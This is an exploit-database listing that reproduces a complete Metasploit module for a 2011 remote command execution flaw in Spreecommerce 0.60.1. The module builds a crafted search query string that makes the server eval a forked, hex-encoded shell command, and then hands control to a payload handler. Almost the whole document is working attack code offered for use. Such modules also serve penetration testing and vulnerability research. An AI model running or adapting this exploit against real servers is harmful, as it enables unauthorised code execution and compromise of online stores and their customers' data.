Spreecommerce 0.60.1 Arbitrary Command Execution



EKU-ID: 1096 CVE: OSVDB-ID: 76011
Author: joernchen Published: 2011-10-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# $Id: spree_search_exec.rb 13831 2011-10-07 17:45:15Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Spreecommerce 0.60.1 Arbitrary Command Execution',
   'Description'    => %q{
     This module exploits an arbitrary command execution vulnerability in the
     Spreecommerce search. Unvalidated input is called via the
     Ruby send method allowing command execution.
   },
   'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #Phenoelit
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 13831 $',
   'References'     =>
    [
     [ 'OSVDB', '76011'],
     [ 'URL', 'http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/' ],
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'BadChars' => "\x60",
     'DisableNops' => true,
     'Space'       => 31337,
     'Compat'      =>
      {
       'PayloadType' => 'cmd',
      }
    },
   'Platform'       => [ 'unix', 'linux' ],
   'Arch'           => ARCH_CMD,
   'Targets'        => [[ 'Automatic', { }]],
   'DefaultTarget'  => 0))

   register_options(
    [
     OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
    ], self.class)
 end

 def exploit
  command = Rex::Text.uri_encode(payload.raw, 'hex-all')
  res = send_request_raw({
   'uri'     => datastore['URI']+ "?search[send][]=eval&search[send][]=Kernel.fork%20do%60#{command}%60end",
   'method'  => 'GET',
   'headers' =>
   {
    'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    'Connection' => 'Close',
   }
  }, 0.4 ) #short timeout, we don't care about the response
   
  if (res)
   print_status("The server returned: #{res.code} #{res.message}")
  end
   
  handler
 end

end